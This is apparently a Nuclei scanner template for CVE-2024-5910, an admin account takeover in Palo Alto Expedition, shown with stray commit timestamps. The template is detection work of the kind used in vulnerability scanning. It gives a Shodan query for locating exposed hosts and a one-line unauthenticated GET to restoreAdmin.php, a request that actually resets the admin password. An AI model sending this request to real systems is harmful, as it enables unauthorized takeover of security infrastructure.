2024-10-09 17:25:16 +00:00
id : CVE-2024-5910
info :
2024-10-15 07:30:37 +00:00
name : Palo Alto Expedition - Admin Account Takeover
2024-10-09 17:25:16 +00:00
author : johnk3r
severity : critical
2024-10-09 19:12:05 +00:00
description : |
Missing authentication for a critical function in Palo Alto Networks Expedition can lead to an Expedition admin account takeover for attackers with network access to Expedition.
2024-10-15 07:30:37 +00:00
reference :
- https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise
- https://security.paloaltonetworks.com/CVE-2024-5910
- https://nvd.nist.gov/vuln/detail/CVE-2024-5910
2024-10-09 19:12:05 +00:00
classification :
2024-10-15 07:30:37 +00:00
cve-id : CVE-2024-5910
cvss-score : 9.3
cwe-id : CWE-306
2024-10-09 19:12:05 +00:00
epss-score : 0.00043
epss-percentile : 0.10397
metadata :
2024-10-15 07:30:37 +00:00
verified : true
2024-10-09 19:12:05 +00:00
max-request : 1
vendor : paloaltonetworks
product : expedition
shodan-query : http.favicon.hash:1499876150
tags : cve,cve2024,palo-alto,auth-bypass
2024-10-09 17:25:16 +00:00
2024-10-09 19:12:05 +00:00
http :
2024-10-09 17:25:16 +00:00
- method : GET
path :
- "{{BaseURL}}/OS/startup/restore/restoreAdmin.php"
matchers-condition : and
matchers :
- type : word
words :
- "Admin user found"
2024-10-09 19:12:05 +00:00
- "Admin password restored"
condition : and
- type : status
status :
- 200
2024-10-15 07:47:43 +00:00
# digest: 4b0a00483046022100ae2af8d3f22acde5d02c660aec9cef1d74a0d99f0b3e920c76a31a3efadbf86a022100f1a5128a2ec167051d28fa1c8b018e8ce88fde39ec5efdaeaa4baf88b5422e87:922c64590222798bb761d5b6d8e72950